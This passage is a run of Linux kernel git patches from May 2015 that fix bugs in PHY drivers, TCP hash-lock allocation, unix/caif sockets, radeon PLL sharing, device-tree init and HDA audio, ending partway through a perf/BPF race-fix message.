buf_seqno(skb_peek(&l_ptr->backlogq)); msg_set_next_sent(msg, next_sent); if (!skb_queue_empty(&l_ptr->deferdq)) { last_rcv = buf_seqno(skb_peek(&l_ptr->deferdq)); From 983942a5eacae8821882a3d348618b020098e8dc Mon Sep 17 00:00:00 2001 From: "Lendacky, Thomas" Date: Tue, 26 May 2015 09:51:49 -0500 Subject: [PATCH 268/872] amd-xgbe-phy: Fix initial mode when autoneg is disabled When the ethtool command is used to set the speed of the device while the device is down, the check to set the initial mode may fail when the device is brought up, causing failure to bring the device up. Update the code to set the initial mode based on the desired speed if auto-negotiation is disabled. This patch fixes a bug introduced by: d9663c8c2149 ("amd-xgbe-phy: Use phydev advertising field vs supported") Signed-off-by: Tom Lendacky Signed-off-by: David S. Miller --- drivers/net/phy/amd-xgbe-phy.c | 45 +++++++++++++++++++++++++++++++--- 1 file changed, 42 insertions(+), 3 deletions(-) diff --git a/drivers/net/phy/amd-xgbe-phy.c b/drivers/net/phy/amd-xgbe-phy.c index fb276f64cd64..34a75cba3b73 100644 --- a/drivers/net/phy/amd-xgbe-phy.c +++ b/drivers/net/phy/amd-xgbe-phy.c @@ -755,6 +755,45 @@ static int amd_xgbe_phy_set_mode(struct phy_device *phydev, return ret; } +static bool amd_xgbe_phy_use_xgmii_mode(struct phy_device *phydev) +{ + if (phydev->autoneg == AUTONEG_ENABLE) { + if (phydev->advertising & ADVERTISED_10000baseKR_Full) + return true; + } else { + if (phydev->speed == SPEED_10000) + return true; + } + + return false; +} + +static bool amd_xgbe_phy_use_gmii_2500_mode(struct phy_device *phydev) +{ + if (phydev->autoneg == AUTONEG_ENABLE) { + if (phydev->advertising & ADVERTISED_2500baseX_Full) + return true; + } else { + if (phydev->speed == SPEED_2500) + return true; + } + + return false; +} + +static bool amd_xgbe_phy_use_gmii_mode(struct phy_device *phydev) +{ + if (phydev->autoneg == AUTONEG_ENABLE) { + if (phydev->advertising & ADVERTISED_1000baseKX_Full) + return true; + } else { + if (phydev->speed == SPEED_1000) + return true; + } + + return false; +} + static int amd_xgbe_phy_set_an(struct phy_device *phydev, bool enable, bool restart) { @@ -1235,11 +1274,11 @@ static int amd_xgbe_phy_config_init(struct phy_device *phydev) /* Set initial mode - call the mode setting routines * directly to insure we are properly configured */ - if (phydev->advertising & SUPPORTED_10000baseKR_Full) + if (amd_xgbe_phy_use_xgmii_mode(phydev)) ret = amd_xgbe_phy_xgmii_mode(phydev); - else if (phydev->advertising & SUPPORTED_1000baseKX_Full) + else if (amd_xgbe_phy_use_gmii_mode(phydev)) ret = amd_xgbe_phy_gmii_mode(phydev); - else if (phydev->advertising & SUPPORTED_2500baseX_Full) + else if (amd_xgbe_phy_use_gmii_2500_mode(phydev)) ret = amd_xgbe_phy_gmii_2500_mode(phydev); else ret = -EINVAL; From 095dc8e0c3686d586a01a50abc3e1bb9ac633054 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Tue, 26 May 2015 07:55:34 -0700 Subject: [PATCH 269/872] tcp: fix/cleanup inet_ehash_locks_alloc() If tcp ehash table is constrained to a very small number of buckets (eg boot parameter thash_entries=128), then we can crash if spinlock array has more entries. While we are at it, un-inline inet_ehash_locks_alloc() and make following changes : - Budget 2 cache lines per cpu worth of 'spinlocks' - Try to kmalloc() the array to avoid extra TLB pressure. (Most servers at Google allocate 8192 bytes for this hash table) - Get rid of various #ifdef Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- include/net/inet_hashtables.h | 47 +++-------------------------------- net/ipv4/inet_hashtables.c | 31 +++++++++++++++++++++++ 2 files changed, 34 insertions(+), 44 deletions(-) diff --git a/include/net/inet_hashtables.h b/include/net/inet_hashtables.h index 774d24151d4a..b73c88a19dd4 100644 --- a/include/net/inet_hashtables.h +++ b/include/net/inet_hashtables.h @@ -24,7 +24,6 @@ #include #include #include -#include #include #include @@ -164,52 +163,12 @@ static inline spinlock_t *inet_ehash_lockp( return &hashinfo->ehash_locks[hash & hashinfo->ehash_locks_mask]; } -static inline int inet_ehash_locks_alloc(struct inet_hashinfo *hashinfo) -{ - unsigned int i, size = 256; -#if defined(CONFIG_PROVE_LOCKING) - unsigned int nr_pcpus = 2; -#else - unsigned int nr_pcpus = num_possible_cpus(); -#endif - if (nr_pcpus >= 4) - size = 512; - if (nr_pcpus >= 8) - size = 1024; - if (nr_pcpus >= 16) - size = 2048; - if (nr_pcpus >= 32) - size = 4096; - if (sizeof(spinlock_t) != 0) { -#ifdef CONFIG_NUMA - if (size * sizeof(spinlock_t) > PAGE_SIZE) - hashinfo->ehash_locks = vmalloc(size * sizeof(spinlock_t)); - else -#endif - hashinfo->ehash_locks = kmalloc(size * sizeof(spinlock_t), - GFP_KERNEL); - if (!hashinfo->ehash_locks) - return ENOMEM; - for (i = 0; i < size; i++) - spin_lock_init(&hashinfo->ehash_locks[i]); - } - hashinfo->ehash_locks_mask = size - 1; - return 0; -} +int inet_ehash_locks_alloc(struct inet_hashinfo *hashinfo); static inline void inet_ehash_locks_free(struct inet_hashinfo *hashinfo) { - if (hashinfo->ehash_locks) { -#ifdef CONFIG_NUMA - unsigned int size = (hashinfo->ehash_locks_mask + 1) * - sizeof(spinlock_t); - if (size > PAGE_SIZE) - vfree(hashinfo->ehash_locks); - else -#endif - kfree(hashinfo->ehash_locks); - hashinfo->ehash_locks = NULL; - } + kvfree(hashinfo->ehash_locks); + hashinfo->ehash_locks = NULL; } struct inet_bind_bucket * diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c index 3766bddb3e8a..185efef0f125 100644 --- a/net/ipv4/inet_hashtables.c +++ b/net/ipv4/inet_hashtables.c @@ -18,6 +18,7 @@ #include #include #include +#include #include #include @@ -609,3 +610,33 @@ void inet_hashinfo_init(struct inet_hashinfo *h) } } EXPORT_SYMBOL_GPL(inet_hashinfo_init); + +int inet_ehash_locks_alloc(struct inet_hashinfo *hashinfo) +{ + unsigned int i, nblocks = 1; + + if (sizeof(spinlock_t) != 0) { + /* allocate 2 cache lines or at least one spinlock per cpu */ + nblocks = max_t(unsigned int, + 2 * L1_CACHE_BYTES / sizeof(spinlock_t), + 1); + nblocks = roundup_pow_of_two(nblocks * num_possible_cpus()); + + /* no more locks than number of hash buckets */ + nblocks = min(nblocks, hashinfo->ehash_mask + 1); + + hashinfo->ehash_locks = kmalloc_array(nblocks, sizeof(spinlock_t), + GFP_KERNEL | __GFP_NOWARN); + if (!hashinfo->ehash_locks) + hashinfo->ehash_locks = vmalloc(nblocks * sizeof(spinlock_t)); + + if (!hashinfo->ehash_locks) + return -ENOMEM; + + for (i = 0; i < nblocks; i++) + spin_lock_init(&hashinfo->ehash_locks[i]); + } + hashinfo->ehash_locks_mask = nblocks - 1; + return 0; +} +EXPORT_SYMBOL_GPL(inet_ehash_locks_alloc); From adba657533bdd255f7b78bc8a324091f46b294cd Mon Sep 17 00:00:00 2001 From: Chris Lesiak Date: Tue, 26 May 2015 15:40:44 -0500 Subject: [PATCH 270/872] hwmon: (ntc_thermistor) Ensure iio channel is of type IIO_VOLTAGE When configured via device tree, the associated iio device needs to be measuring voltage for the conversion to resistance to be correct. Return -EINVAL if that is not the case. Signed-off-by: Chris Lesiak Cc: stable@vger.kernel.org # 3.10+ Signed-off-by: Guenter Roeck --- drivers/hwmon/ntc_thermistor.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/hwmon/ntc_thermistor.c b/drivers/hwmon/ntc_thermistor.c index 112e4d45e4a0..68800115876b 100644 --- a/drivers/hwmon/ntc_thermistor.c +++ b/drivers/hwmon/ntc_thermistor.c @@ -239,8 +239,10 @@ static struct ntc_thermistor_platform_data * ntc_thermistor_parse_dt(struct platform_device *pdev) { struct iio_channel *chan; + enum iio_chan_type type; struct device_node *np = pdev->dev.of_node; struct ntc_thermistor_platform_data *pdata; + int ret; if (!np) return NULL; @@ -253,6 +255,13 @@ ntc_thermistor_parse_dt(struct platform_device *pdev) if (IS_ERR(chan)) return ERR_CAST(chan); + ret = iio_get_channel_type(chan, &type); + if (ret < 0) + return ERR_PTR(ret); + + if (type != IIO_VOLTAGE) + return ERR_PTR(-EINVAL); + if (of_property_read_u32(np, "pullup-uv", &pdata->pullup_uv)) return ERR_PTR(-ENODEV); if (of_property_read_u32(np, "pullup-ohm", &pdata->pullup_ohm)) From a10f0df0615abb194968fc08147f3cdd70fd5aa5 Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Tue, 26 May 2015 18:01:05 -0400 Subject: [PATCH 271/872] drm/radeon: don't share plls if monitors differ in audio support Enabling audio may enable different pll dividers. Don't share plls if the monitors differ in audio support. bug: https://bugzilla.kernel.org/show_bug.cgi?id=98751 Signed-off-by: Alex Deucher Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/atombios_crtc.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c index 42b2ea3fdcf3..e597ffc26563 100644 --- a/drivers/gpu/drm/radeon/atombios_crtc.c +++ b/drivers/gpu/drm/radeon/atombios_crtc.c @@ -1798,7 +1798,9 @@ static int radeon_get_shared_nondp_ppll(struct drm_crtc *crtc) if ((crtc->mode.clock == test_crtc->mode.clock) && (adjusted_clock == test_adjusted_clock) && (radeon_crtc->ss_enabled == test_radeon_crtc->ss_enabled) && - (test_radeon_crtc->pll_id != ATOM_PPLL_INVALID)) + (test_radeon_crtc->pll_id != ATOM_PPLL_INVALID) && + (drm_detect_monitor_audio(radeon_connector_edid(test_radeon_crtc->connector)) == + drm_detect_monitor_audio(radeon_connector_edid(radeon_crtc->connector)))) return test_radeon_crtc->pll_id; } } From 194ec9368c0dbc421acdb2620d4dfb3cc3d022ff Mon Sep 17 00:00:00 2001 From: Sudeep Holla Date: Thu, 14 May 2015 15:28:24 +0100 Subject: [PATCH 272/872] drivers: of/base: move of_init to driver_init Commit 5590f3196b29 ("drivers/core/of: Add symlink to device-tree from devices with an OF node") adds the symlink `of_node` for each device pointing to it's device tree node while creating/initialising it. However the devicetree sysfs is created and setup in of_init which is executed at core_initcall level. For all the devices created before of_init, the following error is thrown: "Error -2(-ENOENT) creating of_node link" Like many other components in driver model, initialize the sysfs support for OF/devicetree from driver_init so that it's ready before any devices are created. Fixes: 5590f3196b29 ("drivers/core/of: Add symlink to device-tree from devices with an OF node") Suggested-by: Rob Herring Cc: Grant Likely Cc: Pawel Moll Cc: Benjamin Herrenschmidt Signed-off-by: Sudeep Holla Tested-by: Robert Schwebel Acked-by: Rob Herring Signed-off-by: Greg Kroah-Hartman --- drivers/base/init.c | 2 ++ drivers/of/base.c | 8 +++----- include/linux/of.h | 6 ++++++ 3 files changed, 11 insertions(+), 5 deletions(-) diff --git a/drivers/base/init.c b/drivers/base/init.c index da033d3bab3c..48c0e220acc0 100644 --- a/drivers/base/init.c +++ b/drivers/base/init.c @@ -8,6 +8,7 @@ #include #include #include +#include #include "base.h" @@ -34,4 +35,5 @@ void __init driver_init(void) cpu_dev_init(); memory_dev_init(); container_dev_init(); + of_core_init(); } diff --git a/drivers/of/base.c b/drivers/of/base.c index 99764db0875a..f0650265febf 100644 --- a/drivers/of/base.c +++ b/drivers/of/base.c @@ -189,7 +189,7 @@ int __of_attach_node_sysfs(struct device_node *np) return 0; } -static int __init of_init(void) +void __init of_core_init(void) { struct device_node *np; @@ -198,7 +198,8 @@ static int __init of_init(void) of_kset = kset_create_and_add("devicetree", NULL, firmware_kobj); if (!of_kset) { mutex_unlock(&of_mutex); - return -ENOMEM; + pr_err("devicetree: failed to register existing nodes\n"); + return; } for_each_of_allnodes(np) __of_attach_node_sysfs(np); @@ -207,10 +208,7 @@ static int __init of_init(void) /* Symlink in /proc as required by userspace ABI */ if (of_root) proc_symlink("device-tree", NULL, "/sys/firmware/devicetree/base"); - - return 0; } -core_initcall(of_init); static struct property *__of_find_property(const struct device_node *np, const char *name, int *lenp) diff --git a/include/linux/of.h b/include/linux/of.h index ddeaae6d2083..b871ff9d81d7 100644 --- a/include/linux/of.h +++ b/include/linux/of.h @@ -121,6 +121,8 @@ extern struct device_node *of_stdout; extern raw_spinlock_t devtree_lock; #ifdef CONFIG_OF +void of_core_init(void); + static inline bool is_of_node(struct fwnode_handle *fwnode) { return fwnode && fwnode->type == FWNODE_OF; @@ -376,6 +378,10 @@ bool of_console_check(struct device_node *dn, char *name, int index); #else /* CONFIG_OF */ +static inline void of_core_init(void) +{ +} + static inline bool is_of_node(struct fwnode_handle *fwnode) { return false; From b48732e4a48d80ed4a14812f0bab09560846514e Mon Sep 17 00:00:00 2001 From: Mark Salyzyn Date: Tue, 26 May 2015 08:22:19 -0700 Subject: [PATCH 273/872] unix/caif: sk_socket can disappear when state is unlocked got a rare NULL pointer dereference in clear_bit Signed-off-by: Mark Salyzyn Acked-by: Hannes Frederic Sowa ---- v2: switch to sock_flag(sk, SOCK_DEAD) and added net/caif/caif_socket.c v3: return -ECONNRESET in upstream caller of wait function for SOCK_DEAD Signed-off-by: David S. Miller --- net/caif/caif_socket.c | 8 ++++++++ net/unix/af_unix.c | 8 ++++++++ 2 files changed, 16 insertions(+) diff --git a/net/caif/caif_socket.c b/net/caif/caif_socket.c index 4ec0c803aef1..112ad784838a 100644 --- a/net/caif/caif_socket.c +++ b/net/caif/caif_socket.c @@ -330,6 +330,10 @@ static long caif_stream_data_wait(struct sock *sk, long timeo) release_sock(sk); timeo = schedule_timeout(timeo); lock_sock(sk); + + if (sock_flag(sk, SOCK_DEAD)) + break; + clear_bit(SOCK_ASYNC_WAITDATA, &sk->sk_socket->flags); } @@ -373,6 +377,10 @@ static int caif_stream_recvmsg(struct socket *sock, struct msghdr *msg, struct sk_buff *skb; lock_sock(sk); + if (sock_flag(sk, SOCK_DEAD)) { + err = -ECONNRESET; + goto unlock; + } skb = skb_dequeue(&sk->sk_receive_queue); caif_check_flow_release(sk); diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c index 5266ea7b922b..06430598cf51 100644 --- a/net/unix/af_unix.c +++ b/net/unix/af_unix.c @@ -1880,6 +1880,10 @@ static long unix_stream_data_wait(struct sock *sk, long timeo, unix_state_unlock(sk); timeo = freezable_schedule_timeout(timeo); unix_state_lock(sk); + + if (sock_flag(sk, SOCK_DEAD)) + break; + clear_bit(SOCK_ASYNC_WAITDATA, &sk->sk_socket->flags); } @@ -1939,6 +1943,10 @@ static int unix_stream_recvmsg(struct socket *sock, struct msghdr *msg, struct sk_buff *skb, *last; unix_state_lock(sk); + if (sock_flag(sk, SOCK_DEAD)) { + err = -ECONNRESET; + goto unlock; + } last = skb = skb_peek(&sk->sk_receive_queue); again: if (skb == NULL) { From d6a4e26afb80c049e7f94e1b7b506dcda61eee88 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Tue, 26 May 2015 08:55:28 -0700 Subject: [PATCH 274/872] tcp: tcp_tso_autosize() minimum is one packet By making sure sk->sk_gso_max_segs minimal value is one, and sysctl_tcp_min_tso_segs minimal value is one as well, tcp_tso_autosize() will return a non zero value. We can then revert 843925f33fcc293d80acf2c5c8a78adf3344d49b ("tcp: Do not apply TSO segment limit to non-TSO packets") and save few cpu cycles in fast path. Signed-off-by: Eric Dumazet Cc: Neal Cardwell Cc: Herbert Xu Acked-by: Neal Cardwell Acked-by: Herbert Xu Signed-off-by: David S. Miller --- net/core/sock.c | 5 ++++- net/ipv4/sysctl_net_ipv4.c | 2 +- net/ipv4/tcp_output.c | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/net/core/sock.c b/net/core/sock.c index 29124fcdc42a..e72633c346b1 100644 --- a/net/core/sock.c +++ b/net/core/sock.c @@ -1581,6 +1581,8 @@ EXPORT_SYMBOL_GPL(sk_clone_lock); void sk_setup_caps(struct sock *sk, struct dst_entry *dst) { + u32 max_segs = 1; + __sk_dst_set(sk, dst); sk->sk_route_caps = dst->dev->features; if (sk->sk_route_caps & NETIF_F_GSO) @@ -1592,9 +1594,10 @@ void sk_setup_caps(struct sock *sk, struct dst_entry *dst) } else { sk->sk_route_caps |= NETIF_F_SG | NETIF_F_HW_CSUM; sk->sk_gso_max_size = dst->dev->gso_max_size; - sk->sk_gso_max_segs = dst->dev->gso_max_segs; + max_segs = max_t(u32, dst->dev->gso_max_segs, 1); } } + sk->sk_gso_max_segs = max_segs; } EXPORT_SYMBOL_GPL(sk_setup_caps); diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c index 841de32f1fee..e64892769607 100644 --- a/net/ipv4/sysctl_net_ipv4.c +++ b/net/ipv4/sysctl_net_ipv4.c @@ -702,7 +702,7 @@ static struct ctl_table ipv4_table[] = { .maxlen = sizeof(int), .mode = 0644, .proc_handler = proc_dointvec_minmax, - .extra1 = &zero, + .extra1 = &one, .extra2 = &gso_max_segs, }, { diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c index 534e5fdb04c1..190538a2a88c 100644 --- a/net/ipv4/tcp_output.c +++ b/net/ipv4/tcp_output.c @@ -2088,7 +2088,7 @@ static bool tcp_write_xmit(struct sock *sk, unsigned int mss_now, int nonagle, if (unlikely(!tcp_snd_wnd_test(tp, skb, mss_now))) break; - if (tso_segs == 1 || !max_segs) { + if (tso_segs == 1) { if (unlikely(!tcp_nagle_test(tp, skb, mss_now, (tcp_skb_is_last(sk, skb) ? nonagle : TCP_NAGLE_PUSH)))) @@ -2101,7 +2101,7 @@ static bool tcp_write_xmit(struct sock *sk, unsigned int mss_now, int nonagle, } limit = mss_now; - if (tso_segs > 1 && max_segs && !tcp_urg_mode(tp)) + if (tso_segs > 1 && !tcp_urg_mode(tp)) limit = tcp_mss_split_point(sk, skb, mss_now, min_t(unsigned int, cwnd_quota, From ffa915d071ce4a05dcd866409df26513d25786f8 Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Wed, 27 May 2015 00:19:03 -0400 Subject: [PATCH 275/872] ipv4: Fix fib_trie.c build, missing linux/vmalloc.h include. We used to get this indirectly I supposed, but no longer do. Either way, an explicit include should have been done in the first place. net/ipv4/fib_trie.c: In function '__node_free_rcu': >> net/ipv4/fib_trie.c:293:3: error: implicit declaration of function 'vfree' [-Werror=implicit-function-declaration] vfree(n); ^ net/ipv4/fib_trie.c: In function 'tnode_alloc': >> net/ipv4/fib_trie.c:312:3: error: implicit declaration of function 'vzalloc' [-Werror=implicit-function-declaration] return vzalloc(size); ^ >> net/ipv4/fib_trie.c:312:3: warning: return makes pointer from integer without a cast cc1: some warnings being treated as errors Reported-by: kbuild test robot Signed-off-by: David S. Miller --- net/ipv4/fib_trie.c | 1 + 1 file changed, 1 insertion(+) diff --git a/net/ipv4/fib_trie.c b/net/ipv4/fib_trie.c index 5a5d9bdeaeb4..01bce1506cd7 100644 --- a/net/ipv4/fib_trie.c +++ b/net/ipv4/fib_trie.c @@ -72,6 +72,7 @@ #include #include #include +#include #include #include #include From 082739aa458a74add9a2362988e5aca0367bfa53 Mon Sep 17 00:00:00 2001 From: Daniel Borkmann Date: Mon, 25 May 2015 14:08:03 +0200 Subject: [PATCH 276/872] tools: bpf_jit_disasm: fix segfault on disabled debugging log output With recent debugging, I noticed that bpf_jit_disasm segfaults when there's no debugging output from the JIT compiler to the kernel log. Reason is that when regexec(3) doesn't match on anything, start/end offsets are not being filled out and contain some uninitialized garbage from stack. Thus, we need zero out offsets first. Signed-off-by: Daniel Borkmann Signed-off-by: David S. Miller --- tools/net/bpf_jit_disasm.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tools/net/bpf_jit_disasm.c b/tools/net/bpf_jit_disasm.c index c5baf9c591b7..618c2bcd4eab 100644 --- a/tools/net/bpf_jit_disasm.c +++ b/tools/net/bpf_jit_disasm.c @@ -123,6 +123,8 @@ static int get_last_jit_image(char *haystack, size_t hlen, assert(ret == 0); ptr = haystack; + memset(pmatch, 0, sizeof(pmatch)); + while (1) { ret = regexec(®ex, ptr, 1, pmatch, 0); if (ret == 0) { From 748a7295d7242bc1aaaec0e245cc61f2be754766 Mon Sep 17 00:00:00 2001 From: Vladimir Zapolskiy Date: Tue, 26 May 2015 03:50:04 +0300 Subject: [PATCH 277/872] net: netxen: correct sysfs bin attribute return code If read() syscall requests unexpected number of bytes from "dimm" binary attribute file, return EINVAL instead of EPERM. At the same time pin down sysfs file size to the fixed sizeof(struct netxen_dimm_cfg), which allows to exploit some missing sanity checks from kernfs (file boundary checks vs offset etc.) Signed-off-by: Vladimir Zapolskiy Signed-off-by: David S. Miller --- drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c b/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c index e0c31e3947d1..6409a06bbdf6 100644 --- a/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c +++ b/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c @@ -3025,9 +3025,9 @@ netxen_sysfs_read_dimm(struct file *filp, struct kobject *kobj, u8 dw, rows, cols, banks, ranks; u32 val; - if (size != sizeof(struct netxen_dimm_cfg)) { + if (size < attr->size) { netdev_err(netdev, "Invalid size\n"); - return -1; + return -EINVAL; } memset(&dimm, 0, sizeof(struct netxen_dimm_cfg)); @@ -3137,7 +3137,7 @@ netxen_sysfs_read_dimm(struct file *filp, struct kobject *kobj, static struct bin_attribute bin_attr_dimm = { .attr = { .name = "dimm", .mode = (S_IRUGO | S_IWUSR) }, - .size = 0, + .size = sizeof(struct netxen_dimm_cfg), .read = netxen_sysfs_read_dimm, }; From e463d88c36d42211aa72ed76d32fb8bf37820ef1 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Tue, 26 May 2015 12:19:58 -0700 Subject: [PATCH 278/872] net: phy: Add phy_interface_is_rgmii helper RGMII interfaces come in 4 different flavors that the PHY library needs to care about: regular RGMII (no delays), RGMII with either RX or TX delay, and both. In order to avoid errors of checking only for one type of RGMII interface and miss the 3 others, introduce a convenience function which tests for all values. Suggested-by: David S. Miller Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- include/linux/phy.h | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/include/linux/phy.h b/include/linux/phy.h index 701c7a3946e0..a26c3f84b8dd 100644 --- a/include/linux/phy.h +++ b/include/linux/phy.h @@ -677,6 +677,17 @@ static inline bool phy_is_internal(struct phy_device *phydev) return phydev->is_internal; } +/** + * phy_interface_is_rgmii - Convenience function for testing if a PHY interface + * is RGMII (all variants) + * @phydev: the phy_device struct + */ +static inline bool phy_interface_is_rgmii(struct phy_device *phydev) +{ + return phydev->interface >= PHY_INTERFACE_MODE_RGMII && + phydev->interface <= PHY_INTERFACE_MODE_RGMII_TXID; +} + /** * phy_write_mmd - Convenience function for writing a register * on an MMD on a given PHY. From 32a641615a11f769a0c1092a47ce00ced9665e66 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Tue, 26 May 2015 12:19:59 -0700 Subject: [PATCH 279/872] net: phy: Utilize phy_interface_is_rgmii Update all open-coded tests for all 4 PHY_INTERFACE_MODE_RGMII* values to use the newly introduced helper: phy_interface_is_rgmii. Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- drivers/net/phy/icplus.c | 5 +---- drivers/net/phy/marvell.c | 10 ++-------- drivers/net/phy/phy.c | 3 +-- 3 files changed, 4 insertions(+), 14 deletions(-) diff --git a/drivers/net/phy/icplus.c b/drivers/net/phy/icplus.c index 8644f039d922..0dbc445a5fa0 100644 --- a/drivers/net/phy/icplus.c +++ b/drivers/net/phy/icplus.c @@ -139,10 +139,7 @@ static int ip1001_config_init(struct phy_device *phydev) if (c < 0) return c; - if ((phydev->interface == PHY_INTERFACE_MODE_RGMII) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_ID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_RXID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_TXID)) { + if (phy_interface_is_rgmii(phydev)) { c = phy_read(phydev, IP10XX_SPEC_CTRL_STATUS); if (c < 0) diff --git a/drivers/net/phy/marvell.c b/drivers/net/phy/marvell.c index 1b1698f98818..f721444c2b0a 100644 --- a/drivers/net/phy/marvell.c +++ b/drivers/net/phy/marvell.c @@ -317,10 +317,7 @@ static int m88e1121_config_aneg(struct phy_device *phydev) if (err < 0) return err; - if ((phydev->interface == PHY_INTERFACE_MODE_RGMII) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_ID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_RXID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_TXID)) { + if (phy_interface_is_rgmii(phydev)) { mscr = phy_read(phydev, MII_88E1121_PHY_MSCR_REG) & MII_88E1121_PHY_MSCR_DELAY_MASK; @@ -469,10 +466,7 @@ static int m88e1111_config_init(struct phy_device *phydev) int err; int temp; - if ((phydev->interface == PHY_INTERFACE_MODE_RGMII) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_ID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_RXID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_TXID)) { + if (phy_interface_is_rgmii(phydev)) { temp = phy_read(phydev, MII_M1111_PHY_EXT_CR); if (temp < 0) diff --git a/drivers/net/phy/phy.c b/drivers/net/phy/phy.c index 377d2db04d33..b2197b506acb 100644 --- a/drivers/net/phy/phy.c +++ b/drivers/net/phy/phy.c @@ -1093,8 +1093,7 @@ int phy_init_eee(struct phy_device *phydev, bool clk_stop_enable) if ((phydev->duplex == DUPLEX_FULL) && ((phydev->interface == PHY_INTERFACE_MODE_MII) || (phydev->interface == PHY_INTERFACE_MODE_GMII) || - (phydev->interface >= PHY_INTERFACE_MODE_RGMII && - phydev->interface <= PHY_INTERFACE_MODE_RGMII_TXID) || + phy_interface_is_rgmii(phydev) || phy_is_internal(phydev))) { int eee_lp, eee_cap, eee_adv; u32 lp, cap, adv; From 49fb18972581a781658a4637de76e6069ed5964e Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 27 May 2015 08:37:19 +0200 Subject: [PATCH 280/872] ALSA: hda - Set stream_pm ops automatically by generic parser This allows user to test power_save_node feature via sysfs or patch firmware even on the codecs that don't specify it. It'll also save a few lines. Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_generic.c | 5 ++++- sound/pci/hda/patch_realtek.c | 1 - sound/pci/hda/patch_sigmatel.c | 1 - sound/pci/hda/patch_via.c | 1 - 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/sound/pci/hda/hda_generic.c b/sound/pci/hda/hda_generic.c index 1c8678775f40..ac0db1679f09 100644 --- a/sound/pci/hda/hda_generic.c +++ b/sound/pci/hda/hda_generic.c @@ -4926,9 +4926,12 @@ int snd_hda_gen_parse_auto_config(struct hda_codec *codec, dig_only: parse_digital(codec); - if (spec->power_down_unused || codec->power_save_node) + if (spec->power_down_unused || codec->power_save_node) { if (!codec->power_filter) codec->power_filter = snd_hda_gen_path_power_filter; + if (!codec->patch_ops.stream_pm) + codec->patch_ops.stream_pm = snd_hda_gen_stream_pm; + } if (!spec->no_analog && spec->beep_nid) { err = snd_hda_attach_beep_device(codec, spec->beep_nid); diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index fc0ccc78bdc7..e3bf72bb278c 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -5724,7 +5724,6 @@ static int patch_alc269(struct hda_codec *codec) set_beep_amp(spec, spec->gen.mixer_nid, 0x04, HDA_INPUT); codec->patch_ops = alc_patch_ops; - codec->patch_ops.stream_pm = snd_hda_gen_stream_pm; #ifdef CONFIG_PM codec->patch_ops.suspend = alc269_suspend; codec->patch_ops.resume = alc269_resume; diff --git a/sound/pci/hda/patch_sigmatel.c b/sound/pci/hda/patch_sigmatel.c index 43c99ce4a520..0de0fd95144a 100644 --- a/sound/pci/hda/patch_sigmatel.c +++ b/sound/pci/hda/patch_sigmatel.c @@ -4403,7 +4403,6 @@ static const struct hda_codec_ops stac_patch_ops = { #ifdef CONFIG_PM .suspend = stac_suspend, #endif - .stream_pm = snd_hda_gen_stream_pm, .reboot_notify = stac_shutup, }; diff --git a/sound/pci/hda/patch_via.c b/sound/pci/hda/patch_via.c index 31a95cca015d..742087ef378f 100644 --- a/sound/pci/hda/patch_via.c +++ b/sound/pci/hda/patch_via.c @@ -472,7 +472,6 @@ static const struct hda_codec_ops via_patch_ops = { .init = via_init, .free = via_free, .unsol_event = snd_hda_jack_unsol_event, - .stream_pm = snd_hda_gen_stream_pm, #ifdef CONFIG_PM .suspend = via_suspend, .check_power_status = via_check_power_status, From dead9f29ddcc69551f35529a252d2704047870d3 Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Fri, 15 May 2015 12:15:21 -0700 Subject: [PATCH 281/872] perf: Fix race in BPF program unregister there is a race between perf_event_free_bpf_prog() and free_trace_kprobe(): __free_event() event->destroy(event) tp_perf_event_destroy() perf_trace_destroy() perf_trace_event_unreg() which is dropping event->tp_event->perf_refcount and allows to proceed in: unregister_trace_kprobe() unregister_kprobe_event() trace_remove_event_call() probe_remove_event_call() free_trace_kprobe() while __free_event does: call_rcu(&event->rcu_head, free_event_rcu); free_event_rcu() perf_event_free_bpf_prog() To fix the race simply move perf_event_free_bpf_prog() before event->destroy(), since event->tp_event is still valid at that point. Note, perf_trace_destroy() is not racing with trace_remove_event_call() since they both grab event_mutex. Reported-by: Wang Nan Signed-off-by: Alexei Starovoitov Signed-off-by: Peter Zijlstra (Intel) Cc: Arnaldo Carvalho de Melo 